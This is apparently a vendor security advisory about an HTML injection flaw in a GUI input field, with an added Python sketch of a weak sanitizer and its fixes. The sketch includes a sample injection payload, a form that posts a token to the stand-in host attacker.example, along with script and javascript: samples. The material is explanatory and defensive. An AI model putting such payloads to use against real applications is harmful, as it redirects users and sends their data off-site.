EIQ-2018-0017

ID

EIQ-2018-0017

CVE

-

Description

HTML injection through the GUI

Date

05 Jun 2019

Severity

2 - MEDIUM

CVSSv3 score

CVSSv3 score not available on NIST NVD.

Status

✅ 2.5.0

Assessment

Some manual input fields in the GUI parse HTML instead of rendering it as raw source.

For example, this happens in the Details input field of a workspace dashboard view when a user is in edit mode.

The input is sanitized to prevent cross-site scripting (XSS) injection.

However, that sanitization does not block HTML that causes a redirect.

As a consequence, a form submission button can be injected whose HTML redirects the viewer to external sites and resources.
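The following Python sketch is an added illustration of the failure mode described above; it is not EclecticIQ's code, whose sanitizer and allowlist are not published. It models an allowlist sanitizer that strips script tags, event handlers and javascript: URLs (so a plain XSS check passes) but accepts form actions and links pointing at any origin, then shows two corrections: rejecting URL attributes that leave a trusted origin, and rendering the field as raw source by escaping everything. The tag allowlist, the trusted origin intel.example, the attacker.example host and the sample payload are all constructed assumptions.

```python
import html
from html.parser import HTMLParser
from urllib.parse import urlparse

# Illustrative allowlist: what a sanitizer aimed only at XSS might keep.
# The product's real allowlist is not published; this is an assumption.
ALLOWED_TAGS = {"p", "b", "i", "a", "form", "input", "button"}
URL_ATTRS = {"href", "action", "formaction"}
SCRIPT_SCHEMES = ("javascript:", "vbscript:", "data:")
DROP_CONTENT = {"script", "style"}   # tags whose text must not leak as data

# Assumed origin of the application itself (hypothetical).
TRUSTED_ORIGIN = "https://intel.example"

# Constructed payload: no script survives, but the form posts off-site.
PAYLOAD = (
    "<p>Quarterly summary</p>"
    "<script>alert(1)</script>"
    '<form action="https://attacker.example/collect">'
    '<input name="token" value="x">'
    '<button onclick="steal()">Submit</button></form>'
    '<a href="javascript:alert(2)">help</a>'
)


class AllowlistSanitizer(HTMLParser):
    """Keeps allowlisted tags, drops on* handlers and script-scheme URLs.

    With trusted_origin=None it reproduces the advisory's gap: URL attributes
    may point anywhere. With a trusted_origin, off-origin URLs are rejected
    and recorded in self.rejected.
    """

    def __init__(self, trusted_origin=None):
        super().__init__(convert_charrefs=True)
        self.trusted_origin = trusted_origin
        self.out = []
        self.rejected = []      # (tag, attr, value) triples that were dropped
        self._dropping = None   # set while inside <script> or <style>

    def _url_ok(self, value):
        v = (value or "").strip().lower()
        if v.startswith(SCRIPT_SCHEMES):
            return False
        if self.trusted_origin is None:
            return True         # the weak behaviour: any origin accepted
        parsed = urlparse(value or "")
        if not parsed.scheme and not parsed.netloc:
            return True         # relative URL stays on our own origin
        return f"{parsed.scheme}://{parsed.netloc}" == self.trusted_origin

    def handle_starttag(self, tag, attrs):
        if tag in DROP_CONTENT:
            self._dropping = tag
        if tag not in ALLOWED_TAGS:
            return
        kept = []
        for name, value in attrs:
            if name.startswith("on") or (name in URL_ATTRS and not self._url_ok(value)):
                self.rejected.append((tag, name, value))
                continue
            kept.append(f' {name}="{html.escape(value or "", quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_startendtag(self, tag, attrs):
        self.handle_starttag(tag, attrs)   # void elements get no closing tag

    def handle_endtag(self, tag):
        if tag == self._dropping:
            self._dropping = None
        if tag in ALLOWED_TAGS:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if self._dropping is None:
            self.out.append(html.escape(data, quote=False))


def sanitize(markup, trusted_origin=None):
    """Return sanitized HTML; pass trusted_origin to block off-site targets."""
    parser = AllowlistSanitizer(trusted_origin)
    parser.feed(markup)
    parser.close()
    return "".join(parser.out)


def audit(markup, trusted_origin):
    """List (tag, attr, url) URL attributes the hardened sanitizer rejects,
    e.g. to check field content stored while an affected version was in use."""
    parser = AllowlistSanitizer(trusted_origin)
    parser.feed(markup)
    parser.close()
    return [(t, a, v) for t, a, v in parser.rejected if a in URL_ATTRS]


def render_as_source(markup):
    """The simplest fix for a plain-text field: never parse it as HTML."""
    return html.escape(markup, quote=True)


if __name__ == "__main__":
    print("weak:     ", sanitize(PAYLOAD))
    print("hardened: ", sanitize(PAYLOAD, TRUSTED_ORIGIN))
    print("audit:    ", audit(PAYLOAD, TRUSTED_ORIGIN))
    print("as source:", render_as_source(PAYLOAD))
```

The weak mode returns markup with no script, no onclick and no javascript: URL, so a test that only looks for XSS passes, yet the form still submits to attacker.example. Restricting URL attributes to a trusted origin closes that gap; for a field that is meant to hold plain text, escaping the whole value (render_as_source) is simpler and removes the parsing step entirely.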

Mitigation

-

Affected versions

2.3.0 to 2.4.0 inclusive.

Notes

Former refs: 25750; 36511

This issue was closed as solved in release 2.4.0.

However, the problem persisted, so we reopened it.

The fix is planned for release 2.5.0.

Note

The Date field refers to the date on which the issue was reopened.